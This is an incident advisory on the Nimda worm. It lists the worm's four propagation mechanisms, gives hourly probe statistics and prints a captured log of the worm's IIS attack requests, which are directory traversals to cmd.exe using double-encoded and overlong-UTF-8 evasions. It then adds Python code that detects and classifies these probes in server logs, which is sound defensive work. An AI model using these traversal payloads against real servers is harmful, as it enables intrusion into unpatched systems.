New IIS "Concept Virus" Worm: NIMDA Propagating Quickly
----------------------------------------------------

UPDATE SUMMARY:

A new worm that has been named "Nimda" is propagating with unprecedented speed across the Internet. The worm appears to have at least four distinct propagation mechanisms.

****INFORMATION IS PRELIMINARY****

(1) An IIS vulnerability propagation mechanism, where the worm attempts to exploit a large number of IIS vulnerabilities to gain control of a victim IIS server. Once in control, the worm uses tftp to fetch its code in a file called Admin.dll from the attacking server.

(2) The worm harvests email addresses from the address book and potentially the web browser history, and sends itself to all addresses as an attachment called readme.exe. Note that the worm may spoof the source address on the emails; some have even been received at incidents.org with source addresses of codered@sans.org and webmaster@incidents.org. Other reports indicate that the spoofed source address of staff@attrition.org has also been seen. It is possible that someone is spoofing these emails intentionally, so that people will trust the source addresses because they belong to security sites.

(3) When a web server is infected, the worm downloads a binary encoded as a wav file to each client that connects to the server. The wav file is called readme.eml. Microsoft Internet Explorer will automatically execute the malicious file.

(4) The worm is network aware and propagates via open shares. It will propagate to shares that are accessible to the username guest with no password.

The worm appears to prefer to target its neighbors, Code Red II style, when scanning for vulnerable IIS servers. This can cause considerable activity on local networks that have several infected machines. One class B site has reported their hourly port 80 probe statistics to us, which are included below. Note how fast the numbers are climbing.
Hour   # Bogus Port 80   # Unique Src
EDT    Probes            Addresses
----   ---------------   ------------
00     53773             7152
01     54242             7221
02     52284             7329
03     59353             7314
04     140291            7492
05     100716            7492
06     53492             7263
07     54392             7227
08     54800             7433
09     113276            24396
10     330131            44576
11     369874            45368
12     399321            44430

-------------------------------------------------------

Many people are reporting this morning that a flood of IIS attacks is hitting their webservers. A short example trace, captured by an Apache server log, is below:

"GET /scripts/root.exe?/c+dir HTTP/1.0" 404 210 "-" "-"
"GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 208 "-" "-"
"GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 218 "-" "-"
"GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 218 "-" "-"
"GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 232 "-" "-"
"GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 249 "-" "-"
"GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 249 "-" "-"
"GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 265 "-" "-"
"GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231 "-" "-"
"GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231 "-" "-"
"GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231 "-" "-"
"GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231 "-" "-"
"GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 215 "-" "-"
"GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 215 "-" "-"
"GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 232 "-" "-"
"GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 232 "-" "-"
"GET /scripts/root.exe?/c+dir HTTP/1.0" 404 210 "-" "-"
"GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 208 "-" "-"
"GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 218 "-" "-"
"GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 218 "-" "-"
"GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 232 "-" "-"
"GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 249 "-" "-"
"GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 249 "-" "-"

Evidently, a new worm is the source of the activity. Once the worm gains access to a vulnerable IIS webserver, it uses tftp to fetch a binary called Admin.dll from the infecting host.
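The trace above is what the probe cycle looks like from a web server's log, and the table above is the kind of per-hour count an operator derives from such logs. The following is an added example, not code from the advisory or from incidents.org, that does both over Apache combined-format log lines: it parses each line, percent-decodes the request URI repeatedly to expose the double-encoded (%255c, %%35%63, %25%35%63) and overlong-UTF-8 (%c0%af, %c1%1c, %c1%9c) directory traversals seen in the trace, labels each probe by the evasion technique it uses, and tallies bogus probes and unique source addresses per hour in the same shape as the table. The sample log text, IP addresses and timestamps are constructed for the example; the request URIs are the ones from the trace.

```python
import re
from collections import defaultdict
from urllib.parse import unquote_to_bytes

# Constructed Apache combined-format log lines (hypothetical hosts and times);
# the request URIs are taken from the worm trace in the advisory.
SAMPLE_LOG = """\
192.0.2.10 - - [18/Sep/2001:09:01:12 -0400] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 210 "-" "-"
192.0.2.10 - - [18/Sep/2001:09:01:12 -0400] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 208 "-" "-"
198.51.100.7 - - [18/Sep/2001:09:02:45 -0400] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 232 "-" "-"
198.51.100.7 - - [18/Sep/2001:09:02:46 -0400] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231 "-" "-"
198.51.100.7 - - [18/Sep/2001:09:02:46 -0400] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 215 "-" "-"
203.0.113.5 - - [18/Sep/2001:10:15:00 -0400] "GET /index.html HTTP/1.0" 200 1043 "-" "Mozilla/4.0"
203.0.113.5 - - [18/Sep/2001:10:15:03 -0400] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 249 "-" "-"
"""

# Apache combined log format: host ident user [time] "method uri proto" status size "referer" "agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<uri>\S+) (?P<proto>[^"]*)" (?P<status>\d{3}) (?P<size>\S+)'
)


def decode_iteratively(uri: str, max_rounds: int = 4) -> tuple[bytes, int]:
    """Percent-decode the URI (as bytes) until it stops changing.

    Returns the decoded bytes and how many rounds actually changed the string:
    0 for a plain URI, 1 for ordinary encoding, 2 or more for double encoding
    such as %255c -> %5c -> backslash. Working in bytes keeps the raw 0xC0/0xC1
    bytes from the overlong sequences intact instead of mangling them as text.
    """
    current = uri.encode("latin-1", "replace")
    rounds = 0
    for _ in range(max_rounds):
        nxt = unquote_to_bytes(current)
        if nxt == current:
            break
        current = nxt
        rounds += 1
    return current, rounds


def classify(uri: str):
    """Label a request URI with the Nimda probe technique it matches, or None.

    Priority: root.exe (the Code Red II backdoor copy of cmd.exe) first, then
    double encoding, then overlong UTF-8, then plain traversal, then any other
    direct reference to cmd.exe (e.g. via the /c/ and /d/ drive mappings).
    """
    decoded, rounds = decode_iteratively(uri)
    low = decoded.lower()
    if b"root.exe" in low:
        return "root.exe backdoor probe"
    if b"cmd.exe" in low:
        if rounds >= 2:
            return "double-encoded traversal to cmd.exe"
        # Lead bytes 0xC0 and 0xC1 never occur in valid UTF-8; IIS's decoder
        # nevertheless accepted them as an encoded slash or backslash.
        if re.search(rb"[\xc0\xc1]", decoded):
            return "overlong-UTF-8 traversal to cmd.exe"
        if b".." in low:
            return "plain traversal to cmd.exe"
        return "direct cmd.exe request"
    return None


def summarize(log_text: str):
    """Return (findings, table): one finding per bogus probe and a per-hour
    dict of (probe count, unique source count), like the advisory's table."""
    hourly = defaultdict(lambda: {"probes": 0, "sources": set()})
    findings = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        kind = classify(m["uri"])
        if kind is None:
            continue
        hour = m["ts"].split(":")[1]  # "18/Sep/2001:09:01:12 -0400" -> "09"
        hourly[hour]["probes"] += 1
        hourly[hour]["sources"].add(m["ip"])
        findings.append((m["ip"], kind, m["uri"]))
    table = {h: (v["probes"], len(v["sources"])) for h, v in sorted(hourly.items())}
    return findings, table


if __name__ == "__main__":
    found, by_hour = summarize(SAMPLE_LOG)
    for ip, kind, uri in found:
        print(f"{ip:15} {kind:40} {uri}")
    print("Hour  Probes  UniqueSrc")
    for hour, (probes, sources) in by_hour.items():
        print(f"{hour:4}  {probes:6}  {sources:9}")
```

Two design points worth noting. Decoding is done on bytes rather than text so that the raw 0xC0/0xC1 bytes survive the decode and can be tested for directly; decoding to a string would re-encode them as UTF-8 on the next round and produce a false "changed" result. And because a successful attack returns something other than 404, the status code is deliberately not part of the detection: the 404s in the trace show the server was not vulnerable, but the same requests with a 200 are the ones that warrant an incident response rather than just a tally.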